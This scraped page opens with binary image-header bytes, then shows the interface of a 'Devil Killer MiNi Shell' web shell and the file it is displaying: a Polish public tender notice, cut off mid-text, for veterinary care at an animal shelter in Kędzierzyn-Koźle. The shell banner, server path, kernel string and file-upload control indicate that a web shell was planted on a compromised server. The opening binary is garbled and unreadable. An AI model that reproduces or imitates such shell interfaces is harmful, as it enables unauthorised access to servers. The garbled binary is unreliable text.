JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241220/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241220/0066726501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opieka lekarsko-weterynaryjna i obsługa medyczna zwierząt w Schronisku dla bezdomnych zwierząt przy ul. Gliwickiej 20 w Kędzierzynie-Koźlu II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD BUDYNKÓW KOMUNALNYCH W KĘDZIERZYNIE-KOŹLU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530859315</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grunwaldzka 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzbk.kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.mzbk.kedzierzynkozle.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opieka lekarsko-weterynaryjna i obsługa medyczna zwierząt w Schronisku dla bezdomnych zwierząt przy ul. Gliwickiej 20 w Kędzierzynie-Koźlu II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a8ddb02c-449f-4f6c-a1dd-edbc1c9e4ae4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00667265</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00185569/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opieka lekarsko-weterynaryja i obsługa medyczna zwierząt w Schronisku dla bezdomnych zwierząt przy ul. Gliwickiej 20 w Kędzierzynie-Koźlu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Ogloszenia/Details/8da1f5fb-ffa7-4d71-b359-da2318baf85c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem: https://e-propublico.pl/Ogloszenia/Details/8da1f5fb-ffa7-4d71-b359-da2318baf85c</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komunikacja Zamawiającego z<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod<br/>adresem: https://e-propublico.pl/Ogloszenia/Details/8da1f5fb-ffa7-4d71-b359-da2318baf85c<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.Zamawiający określa następujące<br/>wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy:<br/>a. stały dostęp do sieci Internet,<br/>b. posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c. komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d. zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich<br/>głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera),<br/>e. włączona obsługa JavaScript oraz Cookies.<br/>Zamawiający dopuszcza następujący format przesyłanych danych:<br/>a. pliki w formatach określonych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych<br/>i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, przy czym zaleca się<br/>wykorzystywanie plików w formacie .pdf, .doc, .docx, .xls, .xlsx.<br/>b. w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z,<br/>c. maksymalny rozmiar pojedynczego pliku to 120 MB, przy czym nie określa się limitu liczby plików.<br/>Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych:<br/>a. załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla<br/>Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku<br/>dopiero po upływie terminu otwarcia ofert;<br/>b. oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny<br/>czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie „Data przesłania”;<br/>c. o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/>W postępowaniu, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są za pośrednictwem Platformy<br/>(karta „Wiadomości”). Wnioski o wyjaśnienie treści SWZ przekazać należy za pośrednictwem Platformy (karta<br/>„Zapytania/Wyjaśnienia”). Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przesłanych za pośrednictwem<br/>Platformy, przyjmuje się datę ich zamieszczenia na Platformie.<br/>Ofertę, wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej (w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej podpisaną podpisem<br/>zaufanym lub podpisem osobistym, za pośrednictwem Platformy.<br/>Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r.<br/>o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022, poz. 1233), które Wykonawca chce zastrzec<br/>w prowadzonym postępowaniu przy składaniu ofert, jako tajemnicę przedsiębiorstwa, powinny zostać przesłane za pośrednictwem<br/>Platformy, w osobnym podpisanym pliku, na karcie „Oferta/Załączniki”, w tabeli „Część oferty stanowiąca tajemnicę<br/>przedsiębiorstwa”, za pomocą opcji „Załącz plik”. Plik z tajemnicą przedsiębiorstwa nie może być łączony z innymi plikami w jednym<br/>archiwum (zip) podpisywanym elektronicznie. Niespełnienie tych zasad zachowania poufności będzie skutkować uznaniem takich<br/>informacji za jawne.<br/>Podpis elektroniczny zastosowany z poziomu programu MS OFFICE nie spełnia wymogu poprawnej weryfikacji.<br/>Nie zaleca się podpisywania folderu Archiwum (zip) zawierającego niepodpisane pliki – powinno nastąpić najpierw podpisanie<br/>plików, a potem ewentualnie spakowanie do zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, tym samy dane Wykonawców będą przetwarzane zgodnie z RODO i przepisami<br/>krajowymi. Szczegółowe określenie zasad zawarto w rozdziale 31 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, tym samy dane Wykonawców będą przetwarzane zgodnie z RODO i przepisami<br/>krajowymi. Szczegółowe określenie zasad zawarto w rozdziale 31 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ/10/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Opieka lekarsko-weterynaryjna i obsługa medyczna zwierząt w Schronisku dla bezdomnych<br/>zwierząt przy ul. Gliwickiej 20 w Kędzierzynie-Koźlu.<br/>Przedmiotem zamówienia jest zapewnienie opieki lekarsko-weterynaryjna i obsługa medyczna zwierząt w Schronisku dla<br/>bezdomnych zwierząt przy ul. Gliwickiej 20 w Kędzierzynie-Koźlu zgodnie z Ustawą<br/>z 27 sierpnia 1997 r. o ochronie zwierząt (Dz. U. z 2023, poz. 1580).<br/>Istotne informacje:<br/>• W schronisku przyjmowanych jest rocznie około 187 psów i 172 kotów (na podstawie danych z ostatnich 6 lat).<br/>• Średnia ilość zwierząt przebywających miesięcznie w schronisku wynosi: około 66 psów i 57 kotów (na podstawie danych<br/>z ostatnich 3 lat).<br/>• W schronisku znajduje się pomieszczenie, w którym mogą być wykonywane kontrole stanu zdrowia zwierząt,<br/>odrobaczanie i odpchlenie oraz szczepienia i czipowanie.<br/>• Natomiast w schronisku nie ma pomieszczenia przeznaczonego do wykonywania skomplikowanych zabiegów leczniczych<br/>i chirurgicznych wymagających sterylnych warunków, dlatego tego typu zabiegi oraz hospitalizacja będą się odbywały w<br/>zakładzie leczniczym Wykonawcy.<br/>2) Do obowiązków Wykonawcy będzie należała stała opieka nad zwierzętami bezdomnymi przebywającymi<br/>w schronisku oraz wykonywanie zabiegów zapobiegających rozmnażaniu zwierząt.<br/>3) Wykonanie przedmiotu zamówienia obejmuje:<br/>1.Prowadzenie obsługi według potrzeb leczenia zwierząt i na pilne wezwanie Zamawiającego;<br/>2.Szczepienie ochronne zwierząt;<br/>3.Leczenie zachowawcze;<br/>4.Leczenie chirurgiczne;<br/>5.Opracowanie harmonogramów żywieniowych;<br/>6.Prowadzenie ewidencji chorych zwierząt;<br/>7.Prowadzenie ewidencji zużytych leków i materiałów medycznych;<br/>8.Dbanie o stan zdrowotny prowadzonych zwierząt;<br/>9.Dbanie o stan sanitarny schroniska;<br/>10.Obserwacja psów podejrzanych o wściekliznę;<br/>11.Wykonywaniu przewidzianych prawem czynności wobec zwierząt przebywających w schronisku chorych na chorobę<br/>zakaźną;<br/>12.Wydawanie paszportów niezbędnych przy adopcjach za granicę;<br/>13.Przestrzeganie przepisów BHP i p.poż obowiązujących na terenie schroniska;<br/>14.Prowadzenie dokumentacji przepisów ustawowych w zakresie weterynarii;<br/>15.Współpraca z kierownictwem i pracownikami schroniska;<br/>16.Wizytacja schroniska trzy razy w tygodniu po 2 godz.;<br/>4) Dyspozycyjność Wykonawcy: w zakresie sprawowania opieki weterynaryjnej nad zwierzętami schronisku oraz<br/>świadczenie usług poprzez wizytę, analizę i wykonanie czynności na terenie schroniska trzy razy w tygodniu po 2 godziny.<br/>W pozostałych dniach, w godzinach pracy lecznicy Wykonawcy sprawowany będzie dyżur weterynaryjny – telefoniczny, w<br/>czasie którego obsługiwane będą przypadki nagłe, wymagające udzielenia natychmiastowej pomocy ze względu na stan<br/>zagrożenia życia lub zdrowia zwierzęcia (nagła interwencja weterynaryjna – nie później niż 3 godz. od zgłoszenia).<br/>5) Wykaz czynności przewidywanych w roku 2025:<br/>1. Badanie biochemiczne krwi -460<br/>2. Czipowanie zwierząt- 140<br/>3. Kastracja kocura -25<br/>4. Sterylizacja kotki -50<br/>5. Sterylizacja suki o masie ciała do 15 kg -18<br/>6. Sterylizacja suki o masie ciała od 15 kg do 40 kg -5<br/>7. Sterylizacja suki o masie ciała powyżej 40 kg -1<br/>8. Kastracja psa o masie ciała do 15 kg -20<br/>9. Kastracja psa o masie ciała od 15 kg do 40 kg -10<br/>10. Kastracja psa o masie ciała powyżej 40 kg - 3<br/>11. Drobny zabieg chirurgiczny (zszywanie ran, gipsowanie, zadławienia, zęby, oko) -80<br/>12. Odrobaczanie zwierzęcia o masie ciała do 10 kg -200<br/>13. Zwalczanie pcheł i kleszczy (za każde 10 kg masy ciała) -150<br/>14. Test diagnostyczny FELV-FIV -75<br/>15. Szczepienie psów przeciw wściekliźnie - 150<br/>16. Szczepienie kotów przeciw wściekliźnie -110<br/>17. Szczepienie ochronne przeciw chorobom wirusowym psów -140<br/>18. Szczepienie ochronne przeciw chorobom wirusowym kotów -100<br/>19. Eutanazja zwierzęcia o masie ciała do 10 kg -15<br/>20. Eutanazja zwierzęcia o masie ciała od 10 kg do 20 kg-3<br/>21. Eutanazja zwierzęcia o masie ciała powyżej 20 kg -3<br/>22. Usypianie ślepych miotów -1<br/>23. RTG -60<br/>24. RTG stomatologiczne -8<br/>25. Sanacja jamy ustnej u kota - 5<br/>26. Sanacja jamy ustnej u psa - 3<br/>27. Pilna interwencja weterynaryjna na wezwanie - 8<br/>28. Wynagrodzenie ryczałtowe - 12 m-cy<br/>29. Leki i materiały medyczne (zgodnie ze zużyciem) - 12 m-cy<br/>6) Badania które będą konieczne do wykonania w celu zapewnienia właściwej opieki medycznej nad zwierzętami<br/>przebywającymi w schronisku wymienione w punkcie 3 ppkt. od 1 do 26 Wykonawca zobowiązany jest podać w cenie<br/>ryczałtowej.<br/>7) Potrzebne leki i materiały medyczne do obsługi weterynaryjnej będą nabywane przez Wykonawcę po uzgodnieniu z<br/>Zamawiającym i rozliczane miesięcznie na fakturze z podziałem na leki i materiały medyczne.<br/>8) Zamawiający informuje, że szacunkowy koszt nabycia leków i materiałów medycznych (biorąc pod uwagę wydatki z lat<br/>ubiegłych) wynosi ok. 87 960,00 zł netto. Kwotę należy uwzględnić w Formularzu cenowym (Fc).<br/>9) W przypadku konieczności wykonania zabiegów nieujętych w Formularzu oferty, podstawą rozliczeń między<br/>Zamawiającym a Wykonawcą będą ceny zawarte w obowiązującym cenniku usług świadczonych przez Wykonawcę.<br/>Wykonawca po wyborze jego oferty jako najkorzystniejszej zobowiązany jest dostarczyć obowiązujący cennik usług<br/>najpóźniej w dniu zawarcia umowy.<br/>10) Wykonawca przez cały okres realizacji umowy zobowiązany jest do posiadania aktualnego wpisu do ewidencji Zakładów<br/>Leczniczych dla Zwierząt, prowadzonej przez właściwą Radę Lekarsko – Weterynaryjną (zgodnie<br/>z ustawą o zakładach leczniczych dla zwierząt (Dz. U. z 2019 r. poz. 24).<br/>11) Wykonawca przez cały okres obowiązywania umowy ma obowiązek dysponowania zakładem leczniczym dla zwierząt<br/>wyposażonym w niezbędny sprzęt i urządzenia do prowadzenia usług weterynaryjnych tj. ultrasonograf i aparat RTG oraz<br/>miejscem do przetrzymywania zwierząt w okresie rekonwalescencji, położonym na terenie oddalonym od schroniska nie<br/>dalej niż 30 km.<br/>12) Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy europejskie lub normy<br/>międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w<br/>tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają<br/>wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania<br/>przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może<br/>wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów<br/>równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ<br/>i/lub<br/>w załącznikach do SWZ. Dopuszcza się również wykazanie tej równoważności normami równoważnymi<br/>w stosunku do tych wskazanych w OPZ. Na Wykonawcy spoczywa ciężar wskazania „równoważności”. Przy doborze<br/>materiałów równoważnych Wykonawca zobowiązany jest zapewnić również osiągnięcie wskaźników określonych w OPZ.<br/>13) Rodzaje i ilości czynności określone w Formularzu ofertowym są wielkościami orientacyjnymi, przyjętymi dla celu<br/>porównania ofert i wyboru najkorzystniejszej oferty. Ilości te będą ulegały zmianie w zależności od potrzeb Zamawiającego,<br/>na co Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian ilościowych i rodzajowych w trakcie realizacji umowy. Wykonawcy nie przysługuje roszczenie o realizację usługi w wielkościach podanych w Formularzu<br/>ofertowym. Zmniejszenie lub zwiększenie wykazu nie stanowi zmiany umowy.<br/>14) Pozostałe warunki realizacji przedmiotu zamówienia określa projekt umowy stanowiący załącznik do niniejszej SWZ (druk nr 6). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenie zamówienia polegającego na powtórzeniu podobnych usług temu samemu Wykonawcy do wysokości 30% wartości zamówienia podstawowego, w okresie nie dłuższym niż 3 lata od udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr Nazwa kryterium Waga<br/>1. Cena brutto całego zadania [PLN] 60%<br/>2. Ilość lekarzy weterynarii [osoba] 30%<br/>3. Czas reakcji na zgłoszenie pilnej interwencji [czas] 10%<br/>2. Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr Wzór<br/>1. Cena brutto (PLN)<br/>Liczba punktów = (Cmin/Cof) * 100 * waga<br/>gdzie:<br/>• Cmin – najniższa cena spośród wszystkich ofert<br/>• Cof - cena podana w badanej ofercie<br/>2. Ilość lekarzy weterynarii [osoba]<br/>gdzie:<br/>• 1 lekarz weterynarii w dyspozycji Wykonawcy – 10 pkt<br/>• 2 lekarzy weterynarii w dyspozycji Wykonawcy – 20 pkt<br/>• 3 i więcej lekarzy weterynarii w dyspozycji Wykonawcy – 30 pkt<br/>Uwaga!<br/>Oferty Wykonawców, którzy nie dysponują przynajmniej jednym lekarzem weterynarii będą podlegały odrzuceniu.<br/>3. Czas reakcji na podjęcie interwencji [czas]<br/>Sposób przyznania punktów w kryterium:<br/>Zamawiający przyzna punkty w przedmiotowym kryterium w zależności od zaoferowanego przez Wykonawcę terminu realizacji<br/>interwencji na wezwanie, o której mowa w pkt 5.4) niniejszej SWZ, w następujący sposób:<br/>• 3 godz. od otrzymania zgłoszenia – 0 pkt<br/>• 2 godz. od otrzymania zgłoszenia – 5 pkt<br/>• 1 godz. od otrzymania zgłoszenia – 10 pkt<br/>Termin 3 godz. realizacji dodatkowego odbioru jest terminem maksymalnym, zgodnie z warunkiem zamawiającego.<br/>Zaproponowanie czasu dłuższego niż 3 godz. będzie stanowić niezgodność z opisem przedmiotu zamówienia i będzie stanowić<br/>podstawę do odrzucenia oferty.<br/>Wykonawca może uzyskać w tym kryterium maksymalnie 10 pkt.<br/>W przypadku niewypełnienia bądź nieprawidłowego wypełnienia (np. nieczytelnego wypełnienia lub zaznaczenia więcej niż jednej<br/>kratki) odpowiedniej pozycji w Formularzu oferty, zamawiający uzna, że wykonawca oferuje maksymalny termin podjęcia działania<br/>związanego z realizacją interwencji określony w SWZ. Wykonawca otrzyma 